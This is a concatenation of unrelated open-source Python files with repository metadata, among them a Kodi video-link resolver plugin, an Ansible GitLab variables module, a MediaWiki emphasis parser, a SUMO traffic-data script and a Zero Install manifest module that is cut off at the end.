@wash_arguments({'confirmed': (int, 0)})
def delete_all(confirmed=0):
"""
Delete every message belonging a logged user.
@param confirmed: 0 will produce a confirmation message.
"""
uid = current_user.get_id()
if confirmed != 1:
return render_template('messages/confirm_delete.html')
if dbquery.delete_all_messages(uid):
flash(_("Your mailbox has been emptied."), "info")
else:
flash(_("Could not empty your mailbox."), "warning")
return redirect(url_for('.index'))
# Registration of email_alert invoked from blueprint
# in order to use before_app_first_request.
# Reading config CFG_WEBMESSAGE_EMAIL_ALERT
# required app context.
@blueprint.before_app_first_request
def invoke_email_alert_register():
email_alert_register()
|
egabancho/invenio
|
invenio/modules/messages/views.py
|
Python
|
gpl-2.0
| 10,605
|
'''
Videozed urlresolver plugin
Copyright (C) 2013 Vinnydude
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
'''
from t0mm0.common.net import Net
from urlresolver.plugnplay.interfaces import UrlResolver
from urlresolver.plugnplay.interfaces import PluginSettings
from urlresolver.plugnplay import Plugin
import re, xbmcgui
from urlresolver import common
from lib import jsunpack
net = Net()
class VideozedResolver(Plugin, UrlResolver, PluginSettings):
implements = [UrlResolver, PluginSettings]
name = "videozed"
def __init__(self):
p = self.get_setting('priority') or 100
self.priority = int(p)
self.net = Net()
def get_media_url(self, host, media_id):
try:
url = self.get_url(host, media_id)
html = self.net.http_GET(url).content
dialog = xbmcgui.DialogProgress()
dialog.create('Resolving', 'Resolving Videozed Link...')
dialog.update(0)
data = {}
r = re.findall(r'type="(?:hidden|submit)?" name="(.+?)"\s* value="?(.+?)">', html)
for name, value in r:
data[name] = value
html = net.http_POST(url, data).content
captcha = re.compile("left:(\d+)px;padding-top:\d+px;'>&#(.+?);<").findall(html)
result = sorted(captcha, key=lambda ltr: int(ltr[0]))
solution = ''.join(str(int(num[1])-48) for num in result)
r = re.findall(r'type="hidden" name="(.+?)" value="(.+?)">', html)
for name, value in r:
data[name] = value
data.update({'code':solution})
html = net.http_POST(url, data).content
sPattern = '<script type=(?:"|\')text/javascript(?:"|\')>(eval\('
sPattern += 'function\(p,a,c,k,e,d\)(?!.+player_ads.+).+np_vid.+?)'
sPattern += '\s+?</script>'
r = re.search(sPattern, html, re.DOTALL + re.IGNORECASE)
if r:
sJavascript = r.group(1)
sUnpacked = jsunpack.unpack(sJavascript)
sPattern = '<embed id="np_vid"type="video/divx"src="(.+?)'
sPattern += '"custommode='
r = re.search(sPattern, sUnpacked)
if r:
dialog.update(100)
dialog.close()
return r.group(1)
else:
num = re.compile('videozed\|(.+?)\|http').findall(html)
pre = 'http://'+num[0]+'.videozed.com:182/d/'
preb = re.compile('image\|(.+?)\|video\|(.+?)\|').findall(html)
for ext, link in preb:
r = pre+link+'/video.'+ext
dialog.update(100)
dialog.close()
return r
except Exception, e:
common.addon.log('**** Videozed Error occured: %s' % e)
common.addon.show_small_popup('Error', str(e), 5000, '')
return self.unresolvable(code=0, msg=e)
def get_url(self, host, media_id):
return 'http://www.videozed.net/%s' % media_id
def get_host_and_id(self, url):
r = re.search('//(.+?)/([0-9a-zA-Z]+)',url)
if r:
return r.groups()
else:
return False
return('host', 'media_id')
def valid_url(self, url, host):
if self.get_setting('enabled') == 'false': return False
return (re.match('http://(www.)?videozed.net/' +
'[0-9A-Za-z]+', url) or
'videozed' in host)
|
SMALLplayer/smallplayer-image-creator
|
storage/.xbmc/addons/script.module.urlresolver/lib/urlresolver/plugins/videozed.py
|
Python
|
gpl-2.0
| 4,224
|
# -*- coding: utf-8 -*-
__author__, __date__ = 'mehdy', '5/4/15'
|
TelePy/TelePy
|
telepy/models/__init__.py
|
Python
|
gpl-2.0
| 66
|
import discord
from sigma.core.utilities.data_processing import user_avatar
from .move_log_embed import make_move_log_embed
async def leave_move_log(ev, guild):
if ev.bot.cfg.pref.movelog_channel:
mlc_id = ev.bot.cfg.pref.movelog_channel
mlc = discord.utils.find(lambda x: x.id == mlc_id, ev.bot.get_all_channels())
if mlc:
if guild.icon_url:
icon = guild.icon_url
else:
icon = user_avatar(guild.owner)
log_embed = discord.Embed(color=0xBE1931)
log_embed.set_author(name='Left A Guild', icon_url=icon, url=icon)
make_move_log_embed(log_embed, guild)
await mlc.send(embed=log_embed)
|
AXAz0r/apex-sigma-core
|
sigma/modules/core_functions/system/leave_move_log.py
|
Python
|
gpl-3.0
| 717
|
#
# Copyright 2007-2012 Free Software Foundation, Inc.
# Copyright (C) by Josh Blum. See LICENSE.txt for licensing information.
#
# This file is part of GREX
#
# GREX is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 3, or (at your option)
# any later version.
#
# GREX is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with GREX; see the file COPYING. If not, write to
# the Free Software Foundation, Inc., 51 Franklin Street,
# Boston, MA 02110-1301, USA.
#
import unittest
import gras
from gras import TestUtils
import numpy
class test_noise_source(unittest.TestCase):
def setUp(self):
self.tb = gras.TopBlock()
def tearDown(self):
self.tb = None
def test_float32(self):
op = gras.make('/grex/noise_source_f32', 0)
op.set_waveform("GAUSSIAN")
op.set_amplitude(10)
head = TestUtils.Head(numpy.float32, 12)
dst = TestUtils.VectorSink(numpy.float32)
self.tb.connect(op, head, dst)
self.tb.run()
# expected results for Gaussian with seed 0, ampl 10
expected_result =(-6.8885869979858398, 26.149959564208984,
20.575775146484375, -7.9340143203735352,
5.3359274864196777, -12.552099227905273,
6.333674430847168, -23.830753326416016,
-16.603046417236328, 2.9676761627197266,
1.2176077365875244, 15.100193977355957)
dst_data = dst.data()
self.assertEqual(len(expected_result), len(dst_data))
for i in range(len(dst_data)):
self.assertAlmostEqual(expected_result[i], dst_data[i], places=3)
if __name__ == '__main__':
unittest.main()
|
manojgudi/sandhi
|
modules/grex/sources/noise_source_test.py
|
Python
|
gpl-3.0
| 2,098
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
# Copyright: (c) 2019, Markus Bergholz (markuman@gmail.com)
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import absolute_import, division, print_function
__metaclass__ = type
ANSIBLE_METADATA = {'metadata_version': '1.1',
'status': ['preview'],
'supported_by': 'community'}
DOCUMENTATION = '''
module: gitlab_project_variable
short_description: Creates/updates/deletes GitLab Projects Variables
description:
- When a project variable does not exist, it will be created.
- When a project variable does exist, its value will be updated when the values are different.
- Variables which are untouched in the playbook, but are not untouched in the GitLab project,
they stay untouched (I(purge) is C(false)) or will be deleted (I(purge) is C(true)).
version_added: "2.9"
author:
- "Markus Bergholz (@markuman)"
requirements:
- python >= 2.7
- python-gitlab python module
extends_documentation_fragment:
- auth_basic
options:
state:
description:
- Create or delete project variable.
- Possible values are present and absent.
default: present
type: str
choices: ["present", "absent"]
api_token:
description:
- GitLab access token with API permissions.
required: true
type: str
project:
description:
- The path and name of the project.
required: true
type: str
purge:
description:
- When set to true, all variables which are not untoucheded in the task will be deleted.
default: false
type: bool
vars:
description:
- A list of key value pairs.
default: {}
type: dict
'''
EXAMPLES = '''
- name: Set or update some CI/CD variables
gitlab_project_variable:
api_url: https://gitlab.com
api_token: secret_access_token
project: markuman/dotfiles
purge: false
vars:
ACCESS_KEY_ID: abc123
SECRET_ACCESS_KEY: 321cba
- name: Delete one variable
gitlab_project_variable:
api_url: https://gitlab.com
api_token: secret_access_token
project: markuman/dotfiles
state: absent
vars:
ACCESS_KEY_ID: abc123
'''
RETURN = '''
project_variable:
description: Four lists of the variablenames which were added, updated, removed or exist.
returned: always
type: dict
contains:
added:
description: A list of variables which were created.
returned: always
type: list
sample: "['ACCESS_KEY_ID', 'SECRET_ACCESS_KEY']"
untouched:
description: A list of variables which exist.
returned: always
type: list
sample: "['ACCESS_KEY_ID', 'SECRET_ACCESS_KEY']"
removed:
description: A list of variables which were deleted.
returned: always
type: list
sample: "['ACCESS_KEY_ID', 'SECRET_ACCESS_KEY']"
updated:
description: A list of variables whose values were changed.
returned: always
type: list
sample: "['ACCESS_KEY_ID', 'SECRET_ACCESS_KEY']"
'''
import traceback
from ansible.module_utils.basic import AnsibleModule, missing_required_lib
from ansible.module_utils._text import to_native
from ansible.module_utils.api import basic_auth_argument_spec
GITLAB_IMP_ERR = None
try:
import gitlab
HAS_GITLAB_PACKAGE = True
except Exception:
GITLAB_IMP_ERR = traceback.format_exc()
HAS_GITLAB_PACKAGE = False
class GitlabProjectVariables(object):
def __init__(self, module, gitlab_instance):
self.repo = gitlab_instance
self.project = self.get_project(module.params['project'])
self._module = module
def get_project(self, project_name):
return self.repo.projects.get(project_name)
def list_all_project_variables(self):
return self.project.variables.list()
def create_variable(self, key, value):
if self._module.check_mode:
return
return self.project.variables.create({"key": key, "value": value})
def update_variable(self, var, value):
if var.value == value:
return False
if self._module.check_mode:
return True
var.value = value
var.save()
return True
def delete_variable(self, key):
if self._module.check_mode:
return
return self.project.variables.delete(key)
def native_python_main(this_gitlab, purge, var_list, state):
change = False
return_value = dict(added=list(), updated=list(), removed=list(), untouched=list())
gitlab_keys = this_gitlab.list_all_project_variables()
existing_variables = [x.get_id() for x in gitlab_keys]
for key in var_list:
if key in existing_variables:
index = existing_variables.index(key)
existing_variables[index] = None
if state == 'present':
single_change = this_gitlab.update_variable(
gitlab_keys[index], var_list[key])
change = single_change or change
if single_change:
return_value['updated'].append(key)
else:
return_value['untouched'].append(key)
elif state == 'absent':
this_gitlab.delete_variable(key)
change = True
return_value['removed'].append(key)
elif key not in existing_variables and state == 'present':
this_gitlab.create_variable(key, var_list[key])
change = True
return_value['added'].append(key)
existing_variables = list(filter(None, existing_variables))
if purge:
for item in existing_variables:
this_gitlab.delete_variable(item)
change = True
return_value['removed'].append(item)
else:
return_value['untouched'].extend(existing_variables)
return change, return_value
def main():
argument_spec = basic_auth_argument_spec()
argument_spec.update(
api_token=dict(type='str', required=True, no_log=True),
project=dict(type='str', required=True),
purge=dict(type='bool', required=False, default=False),
vars=dict(type='dict', required=False, default=dict()),
state=dict(type='str', default="present", choices=["absent", "present"])
)
module = AnsibleModule(
argument_spec=argument_spec,
mutually_exclusive=[
['api_username', 'api_token'],
['api_password', 'api_token'],
],
required_together=[
['api_username', 'api_password'],
],
required_one_of=[
['api_username', 'api_token']
],
supports_check_mode=True
)
api_url = module.params['api_url']
gitlab_token = module.params['api_token']
purge = module.params['purge']
var_list = module.params['vars']
state = module.params['state']
if not HAS_GITLAB_PACKAGE:
module.fail_json(msg=missing_required_lib("python-gitlab"), exception=GITLAB_IMP_ERR)
try:
gitlab_instance = gitlab.Gitlab(url=api_url, private_token=gitlab_token)
gitlab_instance.auth()
except (gitlab.exceptions.GitlabAuthenticationError, gitlab.exceptions.GitlabGetError) as e:
module.fail_json(msg="Failed to connect to GitLab server: %s" % to_native(e))
except (gitlab.exceptions.GitlabHttpError) as e:
module.fail_json(msg="Failed to connect to Gitlab server: %s. \
Gitlab remove Session API now that private tokens are removed from user API endpoints since version 10.2" % to_native(e))
this_gitlab = GitlabProjectVariables(module=module, gitlab_instance=gitlab_instance)
change, return_value = native_python_main(this_gitlab, purge, var_list, state)
module.exit_json(changed=change, project_variable=return_value)
if __name__ == '__main__':
main()
|
aperigault/ansible
|
lib/ansible/modules/source_control/gitlab_project_variable.py
|
Python
|
gpl-3.0
| 7,894
|
f1=open("file_before_enc.txt","r")
s=f1.read()
f1.close()
s=list(s)
s.reverse()
for i in range(len(s)):
s[i]=chr(ord(s[i])+len(s)-i)
s="".join(s)
f2=open("encrypted_file.txt","w+")
f2.write(s)
f2.close()
|
hacktoberfest17/programming
|
encryption_algorithms/simple_encryption_algo_python3/encrypt.py
|
Python
|
gpl-3.0
| 205
|
# Copyright 2012-2013, University of Amsterdam. This program is free software:
# you can redistribute it and/or modify it under the terms of the GNU Lesser
# General Public License as published by the Free Software Foundation, either
# version 3 of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful, but WITHOUT
# ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or
# FITNESS FOR A PARTICULAR PURPOSE. See the GNU Lesser General Public License
# for more details.
#
# You should have received a copy of the GNU Lesser General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import re
# This parses MediaWiki syntax for '''bold''' and ''italic'' text with the equivalent html markup.
class EmphasisResolver:
def resolve_emphasis(self, text):
sb = []
for line in text.split("\n"):
sb.append(self.resolve_line(line))
sb.append("\n")
result = "".join(sb)
result = result[:-1]
return result
# This is a direct translation of the php function doAllQuotes used by the original MediaWiki software.
#
# @param line the line to resolve emphasis within
# @return the line, with all emphasis markup resolved to html tags
#
def resolve_line(self, line):
#print "Resolving line '" + line + "'"
arr = self.get_splits("$"+line)
if len(arr) <= 1:
return line
# First, do some preliminary work. This may shift some apostrophes from
# being mark-up to being text. It also counts the number of occurrences
# of bold and italics mark-ups.
numBold = 0
numItalics = 0
for i, value in enumerate(arr):
if (i % 2 == 1):
# If there are ever four apostrophes, assume the first is supposed to
# be text, and the remaining three constitute mark-up for bold text.
if (len(arr[i]) == 4):
arr[i-1] = arr[i-1] + "'" ;
arr[i] = self.get_filled_string(3) ;
elif len(arr[i]) > 5:
# If there are more than 5 apostrophes in a row, assume they're all
# text except for the last 5.
arr[i-1] = arr[i-1] + self.get_filled_string(len(arr[i])-5)
arr[i] = self.get_filled_string(5)
size = len(arr[i])
if size == 2:
numItalics +=1
elif size == 3:
numBold+=1
elif size == 5:
numItalics +=1
numBold +=1
# If there is an odd number of both bold and italics, it is likely
# that one of the bold ones was meant to be an apostrophe followed
# by italics. Which one we cannot know for certain, but it is more
# likely to be one that has a single-letter word before it.
if (numBold%2==1) and (numItalics%2==1):
i= 0
firstSingleLetterWord = -1
firstMultiLetterWord = -1
firstSpace = -1
for r in arr:
if i%2==1 and len(r)==3:
x1 = arr[i-1][len(arr[i-1])-1]
x2 = arr[i-1][len(arr[i-1])-2]
if x1==' ':
if firstSpace == -1:
firstSpace = i ;
elif x2==' ':
if firstSingleLetterWord == -1:
firstSingleLetterWord = i
else:
if firstMultiLetterWord == -1:
firstMultiLetterWord = i
i += 1
# If there is a single-letter word, use it!
if firstSingleLetterWord > -1:
arr[firstSingleLetterWord] = "''"
arr[firstSingleLetterWord-1] = arr[firstSingleLetterWord] + "'"
elif firstMultiLetterWord > -1:
# If not, but there's a multi-letter word, use that one.
arr[firstMultiLetterWord] = "''"
arr[firstMultiLetterWord-1] = arr[firstMultiLetterWord] + "'"
elif firstSpace > -1:
# ... otherwise use the first one that has neither.
# (notice that it is possible for all three to be -1 if, for example,
# there is only one pentuple-apostrophe in the line)
arr[firstSpace] = "''"
arr[firstSpace-1] = arr[firstSpace] + "'"
# Now let's actually convert our apostrophic mush to HTML!
output = []
buffer = []
state = "" ;
i = 0
for r in arr:
if i%2==0:
if state == "both":
buffer.append(r)
else:
output.append(r)
else:
if len(r) == 2:
if state == "i":
output.append("</i>")
state = ""
elif state == "bi":
output.append("</i>")
state = "b"
elif state =="ib":
output.append("</b></i><b>");
state = "b";
elif state =="both":
output.append("<b><i>") ;
output.append("".join(buffer))
output.append("</i>") ;
state = "b";
else:
# $state can be "b" or ""
output.append("<i>")
state = state + "i"
elif len(r) == 3:
if state == "b":
output.append("</b>")
state = ""
elif state == "bi":
output.append("</i></b><i>")
state = "i"
elif state =="ib":
output.append("</b>");
state = "i";
elif state =="both":
output.append("<i><b>") ;
output.append("".join(buffer))
output.append("</b>") ;
state = "i";
else:
# $state can be "b" or ""
output.append("<b>")
state = state + "b"
elif len(r) == 5:
if state == "b":
output.append("</b><i>")
state = "i"
elif state == "i":
output.append("</i><b>")
state = "b"
elif state =="bi":
output.append("</i></b>");
state = "";
elif state =="ib":
output.append("</b></i>") ;
state = "";
elif state =="both":
output.append("<i><b>") ;
output.append("".join(buffer))
output.append("</b></i>") ;
state = "i";
else:
# ($state == "")
buffer = []
state = "both"
i += 1
# Now close all remaining tags. Notice that the order is important.
if state == "b" or state == "ib":
output.append("</b>")
if state == "i" or state == "bi" or state == "ib":
output.append("</i>")
if state == "bi":
output.append("</b>")
# There might be lonely ''''', so make sure we have a buffer
if state == "both" and len(buffer) > 0:
output.append("<b><i>")
output.append("".join(buffer))
output.append("</i></b>")
#remove leading $
output = output[1:]
return "".join(output)
# Does the same job as php function preg_split
def get_splits(self, text):
#return re.split("\\'{2,}", text)
splits = []
lastCopyIndex = 0
p = re.compile("\\'{2,}")
for m in p.finditer(text):
if m.start() > lastCopyIndex:
splits.append( text[lastCopyIndex: m.start()] )
splits.append( m.group() )
lastCopyIndex = m.end()
if lastCopyIndex < len(text)-1:
splits.append(text[lastCopyIndex])
return splits
def get_filled_string(self, length):
sb = []
for i in xrange(0,length):
sb.append("'")
return "".join(sb)
## EmphasisResolver testing using
## python -m semanticizer.wpm.utils.emphasis_resolver
if __name__ == '__main__':
er = EmphasisResolver()
markup = "'''War''' is an openly declared state of organized [[violent]] [[Group conflict|conflict]], typified by extreme [[aggression]], [[societal]] disruption, and high [[Mortality rate|mortality]]. As a behavior pattern, warlike tendencies are found in many [[primate]] species, including [[humans]], and also found in many [[ant]] species. The set of techniques used by a group to carry out war is known as '''warfare'''."
#markup = "Parsing '''MediaWiki''''s syntax for '''bold''' and ''italic'' markup is a '''''deceptively''' difficult'' task. Whoever came up with the markup scheme should be '''shot'''." ;
print er.resolve_emphasis(markup)
|
redreamality/semanticizer
|
semanticizer/wpm/utils/emphasis_resolver.py
|
Python
|
gpl-3.0
| 9,642
|
# -*- coding: Latin-1 -*-
"""
@file GenerateRawFCD.py
@author Sascha Krieg
@author Daniel Krajzewicz
@author Michael Behrisch
@date 2008-07-26
Creates files with a comparison of speeds for each edge between the taxis and the average speed from the current edge.
Dependent of the frequency and the taxi quota.
SUMO, Simulation of Urban MObility; see http://sumo.sourceforge.net/
Copyright (C) 2008-2012 DLR (http://www.dlr.de/) and contributors
All rights reserved
"""
import random
import os.path
import profile
from cPickle import dump
from cPickle import load
#global vars
mainPath="D:/Krieg/Projekte/Diplom/Daten/fcdQualitaet/"
#mainPath="F:/DLR/Projekte/Diplom/Daten/fcdQualitaet/"
edgeDumpPath=mainPath+"edgedumpFcdQuality_900_6Uhr.xml"
edgeDumpPicklePath=mainPath+"edgedumpFcdPickleDict.pickle"
vtypePath=mainPath+"vtypeprobeFcdQuality_1s_6Uhr.out.xml"
vtypePicklePath=mainPath+"vtypeprobePickleDict.pickle"
vehPicklePath=mainPath+"vehiclePickleList.pickle"
outputPath=mainPath+"output/simResult_"
simStartTime=21600 # =6 o'clock ->begin in edgeDump
period=[5,10,20,30,40,50,60,90,120] #period in seconds | single element or a hole list
quota=[0.25, 0.5, 0.75, 1.0, 1.5, 2.0, 3.0, 5.0, 10.0] #how many taxis in percent of the total vehicles | single element or a hole list
def main():
global period, quota
print "start program"
edgeDumpDict=make(edgeDumpPicklePath,edgeDumpPath,readEdgeDump)
vtypeDict=make(vtypePicklePath,vtypePath,readVtype)
vehList=make(vehPicklePath,vtypePicklePath,getVehicleList,False,vtypeDict)
vehSum=len(vehList)
if type(period)!=list: period=[period]
if type(quota)!=list: quota=[quota]
pList=period
qList=quota
for period in pList:
for quota in qList:
print "create output for: period ",period," quota ",quota
taxis=chooseTaxis(vehList)
taxiSum=len(taxis)
vtypeDictR=reduceVtype(vtypeDict,taxis); del taxis
createOutput(edgeDumpDict, vtypeDictR,vehSum, taxiSum)
print "end"
def readEdgeDump():
"""Get for each interval all edges with corresponding speed."""
edgeDumpDict={}
begin=False
interval=0
inputFile=open(edgeDumpPath,'r')
for line in inputFile:
words=line.split('"')
if not begin and words[0].find("<end>")!=-1:
words=words[0].split(">")
interval=int(words[1][:-5])
edgeDumpDict.setdefault(interval,[])
elif words[0].find("<interval")!=-1 and int(words[1])>=simStartTime:
interval=int(words[1])
begin=True
if begin and words[0].find("<edge id")!=-1:
edge=words[1]
speed=float(words[13])
edgeDumpDict.setdefault(interval,[]).append((edge,speed))
inputFile.close()
return edgeDumpDict
def readVtype():
"""Gets all necessary information of all vehicles."""
vtypeDict={}
timestep=0
begin=False
inputFile=open(vtypePath,'r')
for line in inputFile:
words=line.split('"')
if words[0].find("<timestep ")!=-1 and int(words[1])>=simStartTime:
timestep=int(words[1])
begin=True
if begin and words[0].find("<vehicle id=")!=-1:
# time id edge speed
vtypeDict.setdefault(timestep,[]).append((words[1],words[3][:-2],words[15]))
#break
inputFile.close()
return vtypeDict
def getVehicleList(vtypeDict):
"""Collects all vehicles used in the simulation."""
vehSet=set()
for timestepList in vtypeDict.values():
for elm in timestepList:
vehSet.add(elm[0])
return list(vehSet)
def make(source, dependentOn, builder, buildNew=False,*builderParams):
"""Fills the target (a variable) with Information of source (pickelt var).
It Checks if the pickle file is up to date in comparison to the dependentOn file.
If not the builder function is called.
If buildNew is True the builder function is called anyway.
"""
#check if pickle file exists
if not os.path.exists(source):
buildNew=True
#check date
if not buildNew and os.path.getmtime(source)>os.path.getmtime(dependentOn): #if source is newer
print "load source: ",os.path.basename(source),"..."
target=load(open(source,'rb'))
else:
print "build source: ",os.path.basename(source),"..."
target=builder(*builderParams)
#pickle the target
dump(target, open(source,'wb'),1)
print "Done!"
return target
def chooseTaxis(vehList):
""" Chooses from the vehicle list random vehicles with should act as taxis."""
#calc absolute amount of taxis
taxiNo=int(round(quota*len(vehList)/100))
random.shuffle(vehList)
return vehList[:taxiNo]
def reduceVtype(vtypeDict,taxis):
"""Reduces the vtypeDict to the relevant information."""
newVtypeDict={}
for timestep in vtypeDict:
if timestep%period==0: #timesteps which are a multiple of the period
newVtypeDict[timestep]=([tup for tup in vtypeDict[timestep] if tup[0] in taxis])
return newVtypeDict
def createOutput(edgeDumpDict, vtypeDict,vehSum, taxiSum):
"""Creates a file with a comparison of speeds for each edge
between the taxis and the average speed from the current edge."""
intervalList=edgeDumpDict.keys()
intervalList.sort()
interval=intervalList[1]-intervalList[0]
outputFile=open(outputPath+str(period)+"s_"+str(quota)+"%.out.xml",'w')
outputFile.write('<?xml version="1.0"?>\n')
outputFile.write('<results simStart="%d" interval="%d" taxiQuota="%.3f" period="%d" vehicles="%d" taxis="%d">\n' %(simStartTime, interval, quota, period, vehSum, taxiSum))
for i in intervalList[:-1]: #each interval
outputFile.write('\t<interval begin="%d" end="%d">\n' %(i,i+interval-1))
intEdges={}
for timestep,taxiList in vtypeDict.iteritems():
if i<timestep<intervalList[intervalList.index(i)+1]: #for each timestep in the interval
for tup in taxiList: #all elements in this timestep
intEdges.setdefault(tup[1],[]).append(float(tup[2])) #add speed entry to the relevant edge
#wirte results for every founded edge
for edge,v in edgeDumpDict[i]:
if edge in intEdges:
vList=intEdges[edge]
meanV=sum(vList)/len(vList)
abs=meanV-v
rel=abs/v*100
outputFile.write('\t\t<edge id="%s" simSpeed="%.2f" fcdSpeed="%.2f" absDeviation="%.2f" relDeviation="%.2f"/>\n' %(edge, v, meanV, abs,rel))
outputFile.write('\t</interval>\n')
outputFile.write('</results>')
outputFile.close()
#start the program
#profile.run('main()')
main()
|
rudhir-upretee/Sumo_With_Netsim
|
tools/projects/TaxiFCD_Krieg/src/fcdQuality/ParamEffectsOLD.py
|
Python
|
gpl-3.0
| 7,055
|
"""Deprecated import support. Auto-generated by import_shims/generate_shims.sh."""
# pylint: disable=redefined-builtin,wrong-import-position,wildcard-import,useless-suppression,line-too-long
from import_shims.warn import warn_deprecated_import
warn_deprecated_import('contentstore.api.tests', 'cms.djangoapps.contentstore.api.tests')
from cms.djangoapps.contentstore.api.tests import *
|
eduNEXT/edunext-platform
|
import_shims/studio/contentstore/api/tests/__init__.py
|
Python
|
agpl-3.0
| 389
|
#-*- coding:utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2009 Tiny SPRL (<http://tiny.be>). All Rights Reserved
# d$
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
{
'name': 'account_invoice_journal_defaults',
'version': '1.0',
'category': 'Accounting & Finance',
"sequence": 4,
'complexity': "normal",
'description': '''
* account_id and journal_id added to onchange_partner
* account_id added in onchange_journal
* account_id associated with the journal or with the account in the partner
* account_id change to read-only
''',
"author" : 'ClearCorp',
'website':'http://www.clearcorp.co.cr',
"depends" : ['account'],
'update_xml': [
'account_invoice_journal_defaults_view.xml',
],
"auto_install": False,
"application": False,
"installable": True,
'license': 'AGPL-3',
}
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
|
sysadminmatmoz/odoo-clearcorp
|
account_invoice_journal_defaults/__openerp__.py
|
Python
|
agpl-3.0
| 1,847
|
"""Processing of implementation manifests.
A manifest is a string representing a directory tree, with the property
that two trees will generate identical manifest strings if and only if:
- They have extactly the same set of files, directories and symlinks.
- For each pair of corresponding directories in the two sets:
- The mtimes are the same (OldSHA1 only).
- For each pair of corresponding files in the two sets:
- The size, executable flag and mtime are the same.
- The contents have matching secure hash values.
- For each pair of corresponding symlinks in the two sets:
- The mtime and size are the same.
- The targets have matching secure hash values.
The manifest is typically processed with a secure hash itself. So, the idea is that
any significant change to the contents of the tree will change the secure hash value
of the manifest.
A top-level ".manifest" file is ignored.
"""
# Copyright (C) 2009, Thomas Leonard
# See the README file for details, or visit http://0install.net.
import os, stat, base64
from zeroinstall import SafeException, _, logger
from zeroinstall.zerostore import BadDigest, parse_algorithm_digest_pair, format_algorithm_digest_pair
import hashlib
sha1_new = hashlib.sha1
class Algorithm:
"""Abstract base class for algorithms.
An algorithm knows how to generate a manifest from a directory tree.
@ivar rating: how much we like this algorithm (higher is better)
@type rating: int
"""
def generate_manifest(self, root):
"""Returns an iterator that yields each line of the manifest for the directory
tree rooted at 'root'."""
raise Exception('Abstract')
def new_digest(self):
"""Create a new digest. Call update() on the returned object to digest the data.
Call getID() to turn it into a full ID string."""
raise Exception('Abstract')
def getID(self, digest):
"""Convert a digest (from new_digest) to a full ID."""
raise Exception('Abstract')
class OldSHA1(Algorithm):
"""@deprecated: Injector versions before 0.20 only supported this algorithm."""
rating = 10
def generate_manifest(self, root):
def recurse(sub):
# To ensure that a line-by-line comparison of the manifests
# is possible, we require that filenames don't contain newlines.
# Otherwise, you can name a file so that the part after the \n
# would be interpreted as another line in the manifest.
if '\n' in sub: raise BadDigest("Newline in filename '%s'" % sub)
assert sub.startswith('/')
if sub == '/.manifest': return
full = os.path.join(root, sub[1:].replace('/', os.sep))
info = os.lstat(full)
m = info.st_mode
if stat.S_ISDIR(m):
if sub != '/':
yield "D %s %s" % (int(info.st_mtime), sub)
items = os.listdir(full)
items.sort()
subdir = sub
if not subdir.endswith('/'):
subdir += '/'
for x in items:
for y in recurse(subdir + x):
yield y
return
assert sub[1:]
leaf = os.path.basename(sub[1:])
if stat.S_ISREG(m):
with open(full, 'rb') as stream:
d = sha1_new(stream.read()).hexdigest() # XXX could be very large!
if m & 0o111:
yield "X %s %s %s %s" % (d, int(info.st_mtime), info.st_size, leaf)
else:
yield "F %s %s %s %s" % (d, int(info.st_mtime), info.st_size, leaf)
elif stat.S_ISLNK(m):
target = os.readlink(full).encode('utf-8')
d = sha1_new(target).hexdigest()
# Note: Can't use utime on symlinks, so skip mtime
# Note: eCryptfs may report length as zero, so count ourselves instead
yield "S %s %s %s" % (d, len(target), leaf)
else:
raise SafeException(_("Unknown object '%s' (not a file, directory or symlink)") %
full)
for x in recurse('/'): yield x
def new_digest(self):
return sha1_new()
def getID(self, digest):
return 'sha1=' + digest.hexdigest()
def get_algorithm(name):
"""Look-up an L{Algorithm} by name.
@raise BadDigest: if the name is unknown."""
try:
return algorithms[name]
except KeyError:
raise BadDigest(_("Unknown algorithm '%s'") % name)
def generate_manifest(root, alg = 'sha1'):
"""@deprecated: use L{get_algorithm} and L{Algorithm.generate_manifest} instead."""
return get_algorithm(alg).generate_manifest(root)
def add_manifest_file(dir, digest_or_alg):
"""Writes a .manifest file into 'dir', and returns the digest.
You should call fixup_permissions before this to ensure that the permissions are correct.
On exit, dir itself has mode 555. Subdirectories are not changed.
@param dir: root of the implementation
@param digest_or_alg: should be an instance of Algorithm. Passing a digest
here is deprecated."""
mfile = os.path.join(dir, '.manifest')
if os.path.islink(mfile) or os.path.exists(mfile):
raise SafeException(_("Directory '%s' already contains a .manifest file!") % dir)
manifest = ''
if isinstance(digest_or_alg, Algorithm):
alg = digest_or_alg
digest = alg.new_digest()
else:
digest = digest_or_alg
alg = get_algorithm('sha1')
for line in alg.generate_manifest(dir):
manifest += line + '\n'
manifest = manifest.encode('utf-8')
digest.update(manifest)
os.chmod(dir, 0o755)
with open(mfile, 'wb') as stream:
os.chmod(dir, 0o555)
stream.write(manifest)
os.chmod(mfile, 0o444)
return digest
def splitID(id):
"""Take an ID in the form 'alg=value' and return a tuple (alg, value),
where 'alg' is an instance of Algorithm and 'value' is a string.
@raise BadDigest: if the algorithm isn't known or the ID has the wrong format."""
alg, digest = parse_algorithm_digest_pair(id)
